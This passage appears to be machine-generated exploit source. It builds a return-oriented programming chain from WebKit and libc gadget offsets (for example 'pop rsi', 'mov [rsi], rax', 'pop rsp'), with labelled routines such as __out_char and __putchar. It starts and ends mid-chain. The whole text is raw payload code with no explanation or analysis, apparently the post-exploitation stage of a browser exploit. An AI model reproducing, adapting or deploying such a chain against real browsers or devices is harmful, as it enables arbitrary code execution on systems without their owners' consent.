libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+166280, //L2465
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+166248, //L2463
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+166264, //L2464
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2462:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L2463:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2464:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2465:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+166336, //L2467
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L2467:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+166464, //L2469
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+166480, //L2470
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+166448, //L2468
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2468:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2469:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2470:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+166568, //L2471
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+166584, //L2473
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2471:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2473:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2474:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+166704, //L2477
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+166688, //L2475
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2475:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2477:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+166792, //L2478
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+166808, //L2480
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2478:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2480:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2481:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+166928, //L2484
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+166912, //L2482
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2482:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2484:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+167016, //L2485
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+167032, //L2487
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2485:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2487:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2488:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+167152, //L2491
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+167136, //L2489
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2489:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2491:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+167296, //L2494
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+167264, //L2492
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+167280, //L2493
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2492:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2493:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2494:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+167400, //L2495
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+167416, //L2496
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L2495:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2496:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+167536, //L2497
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+167520, //L2498
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L2498:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L2497:
db([0, 0]); // 0x0
//__out_char:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+167608, //L2500
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L2500:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+167704, //L2501
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+167736, //L2504
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+763368 //pop rcx
]);
//L2501:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2503:
db([24, 0]); // 0x18
set_gadget(webkit_base+568675,); //pop r8
//L2504:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+167840, //L2507
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+167824, //L2505
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2505:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2507:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+167928, //L2508
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+167944, //L2510
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2508:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2510:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2511:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+168064, //L2514
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+168048, //L2512
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2512:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2514:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+168152, //L2515
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+168168, //L2517
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2515:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2517:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2518:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+168288, //L2521
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+168272, //L2519
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2519:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2521:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+168376, //L2522
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+168392, //L2524
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2522:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2524:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2525:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+168512, //L2528
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+168496, //L2526
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2526:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2528:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+168672, //L2532
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+168640, //L2530
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+168656, //L2531
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2529:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L2530:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2531:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2532:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+168728, //L2534
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L2534:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+168856, //L2536
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+168872, //L2537
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+168840, //L2535
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2535:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2536:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2537:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+169032, //L2541
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+169000, //L2539
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+169016, //L2540
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2538:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L2539:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2540:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2541:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+169088, //L2543
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L2543:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+169216, //L2545
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+169232, //L2546
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+169200, //L2544
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2544:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2545:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2546:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+169344, //L2548
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+169392, //L2551
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+169360, //L2549
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L2548:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2549:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2550:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2551:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+169504, //L2552+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+169496, //L2552
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L2552:
db([0, 0]); // 0x0
set_gadgets([
ropchain+169520, //L2552+24
ropchain+170728, //L2547
libc_base+764760, //pop rsi
ropchain+169560, //L2553
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2553:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2555:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+169680, //L2558
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+169664, //L2556
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2556:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2558:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+169840, //L2562
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+169808, //L2560
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+169824, //L2561
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2559:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L2560:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2561:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2562:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+169896, //L2564
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L2564:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+170024, //L2566
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+170040, //L2567
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+170008, //L2565
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2565:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2566:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2567:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+170200, //L2571
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+170168, //L2569
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+170184, //L2570
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2568:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L2569:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2570:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2571:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+170256, //L2573
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L2573:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+170384, //L2575
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+170400, //L2576
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+170368, //L2574
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2574:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2575:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2576:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+170480, //L2577
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+170496, //L2578
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2577:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2578:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+170592, //L2580
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+170576, //L2579
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2579:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2580:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608, //pop rax
//L2582:
ropchain+170696, //L2581
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+782311, //pop rsp
ropchain+570904, //__putchar
//L2581:
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
//L2547:
libc_base+764760, //pop rsi
ropchain+170808, //L2584
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+170792, //L2583
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2583:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2584:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+170912, //L2585
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+170928, //L2586
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L2585:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2586:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+171048, //L2587
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+171032, //L2588
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L2588:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L2587:
db([0, 0]); // 0x0
//__out_fct:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+171120, //L2590
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L2590:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+171216, //L2591
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+171248, //L2594
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+763368 //pop rcx
]);
//L2591:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2593:
db([32, 0]); // 0x20
set_gadget(webkit_base+568675,); //pop r8
//L2594:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+171352, //L2597
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+171336, //L2595
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2595:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2597:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+171440, //L2598
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+171456, //L2600
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2598:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2600:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2601:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+171576, //L2604
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+171560, //L2602
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2602:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2604:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+171664, //L2605
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+171680, //L2607
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2605:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2607:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2608:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+171800, //L2611
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+171784, //L2609
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2609:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2611:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+171960, //L2615
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+171928, //L2613
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+171944, //L2614
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2612:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L2613:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2614:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2615:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+172016, //L2617
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L2617:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+172144, //L2619
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+172160, //L2620
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+172128, //L2618
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2618:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2619:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2620:
db([0, 0]); // 0x0
